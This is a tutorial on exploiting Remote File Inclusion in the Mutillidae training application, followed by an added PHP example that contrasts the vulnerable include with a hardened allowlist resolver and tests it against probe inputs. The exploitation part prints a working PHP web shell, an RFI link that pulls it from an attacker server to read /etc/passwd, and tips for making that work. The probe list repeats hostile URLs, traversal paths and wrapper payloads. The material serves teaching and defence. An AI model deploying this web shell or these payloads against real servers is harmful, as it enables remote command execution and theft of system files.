Remote File Inclusion

Overview

Remote File Inclusion (RFI) allows an attacker to make the web server include a file that is remote from the server's point of view. Because the included file is treated as code, this can lead to code execution on the server, denial of service, and data disclosure. In PHP the vulnerability requires that user-controlled input reaches include/require and that the server has allow_url_include (and allow_url_fopen) enabled.

Discovery Methodology

The page displayed in Mutillidae is determined by the value of the "page" parameter. What would happen if the "page" parameter were changed to a URI that points at a file on a remote server, a file that was never intended to be served as part of the application?

Exploitation

A URI can be used to specify a remote file such as http://www.google.com. Click this link to load the Google search page into Mutillidae; note that the page parameter contains the URL of the search page.

index.php?page=http://www.google.com

If we host our own content, we control the content of the page that the page parameter loads. For example, host a small PHP web shell file on a site you control:
```php
<?php
// Minimal web shell: runs whatever arrives in the pCommand parameter
// with the privileges of the web server account and echoes the output.
echo "<pre>";
// Show the command being executed (keeps the page's original behaviour).
echo "shell_exec ".$_REQUEST["pCommand"]."\n\n";
// Execute the command and print its raw output.
echo shell_exec($_REQUEST["pCommand"]);
echo "</pre>";
?>
```
Once the web shell is ready to be pulled from the attacking server, build a hyperlink that exploits the Remote File Inclusion (RFI) vulnerability in index.php so that the web shell is included into the web page:

http://mutillidae/index.php?page=http://[ATTACKING SERVER IP ADDRESS]/shell.php?pCommand=cat%2b%2fetc%2fpasswd

Two things to check before relying on this link. The included code executes on the target, so `$_REQUEST["pCommand"]` is read from the request that reaches the target's index.php, and the attacking server must return shell.php as plain text rather than executing it itself (host it on a server that does not run PHP, or under an extension PHP does not handle). The target also URL-decodes its query string once, so a space in the command is sent as `%20` (or `+`), whereas `%2b` arrives at the target as a literal plus sign.
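The pattern behind the "page" parameter, and what a fix looks like, as an added example that is not code from Mutillidae or from this page. The function names `vulnerableInclude`, `resolvePage` and `remoteIncludePossible`, the allowlist and the page directory are assumptions made for the example; the probe inputs are constructed.

```php
<?php
// Added example, not part of the Mutillidae page: the vulnerable include
// pattern the page exploits beside a hardened replacement.
// vulnerableInclude, resolvePage, remoteIncludePossible, $allowed and
// $pageDir are hypothetical names chosen for this example.

declare(strict_types=1);

// Vulnerable pattern: whatever arrives in ?page= goes straight to include.
// With allow_url_include=On, "http://attacker/shell.php" is fetched and
// executed on this server; with it Off, "../../etc/passwd" still works as a
// local file inclusion.
function vulnerableInclude(string $page): void
{
    include $page;
}

// allow_url_include only has effect when allow_url_fopen is also on.
function remoteIncludePossible(): bool
{
    return filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)
        && filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Hardened replacement: the page parameter is a key into a fixed allowlist,
// never a path. URL wrappers, traversal sequences, unknown names and anything
// that does not resolve inside $pageDir are rejected before include is called.
function resolvePage(string $requested, array $allowed, string $pageDir): ?string
{
    // Reject any scheme prefix (http://, ftp://, php://, data:, ...).
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $requested)) {
        return null;
    }
    // Reject directory separators, NUL bytes and traversal sequences.
    if (strpbrk($requested, "/\\\0") !== false || str_contains($requested, '..')) {
        return null;
    }
    // Only known page names are acceptable.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    $base = realpath($pageDir);
    $full = realpath($pageDir . DIRECTORY_SEPARATOR . $requested . '.php');
    // realpath() is false for a missing file; also confirm the resolved path
    // is still inside the page directory (defends against symlinked pages).
    if ($base === false || $full === false
        || !str_starts_with($full, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $full;
}

// Demonstration with constructed inputs. A throwaway page directory is
// created so that the allowed names actually resolve; nothing is included.
$allowed = ['home', 'login', 'about'];
$pageDir = sys_get_temp_dir() . '/rfi_demo_pages';
@mkdir($pageDir);
foreach ($allowed as $name) {
    file_put_contents("$pageDir/$name.php", "<?php echo '$name page';");
}

printf("remote include possible on this PHP: %s\n",
    remoteIncludePossible() ? 'yes' : 'no');

$probes = [
    'home',
    'http://www.google.com',
    'http://attacker.example/shell.php?pCommand=id',
    '../../../../etc/passwd',
    'php://filter/convert.base64-encode/resource=index',
    'login',
];
foreach ($probes as $p) {
    $resolved = resolvePage($p, $allowed, $pageDir);
    printf("%-55s -> %s\n", $p, $resolved === null ? 'rejected' : 'include ' . $resolved);
}
```

Run it with `php rfi_demo.php`; only `home` and `login` resolve to a path, every URL, wrapper and traversal probe is rejected. The design point is that the allowlist check alone is not enough: the scheme and separator checks stop a bypass where an allowed name appears inside a longer value, and the realpath comparison catches a symlink placed in the page directory.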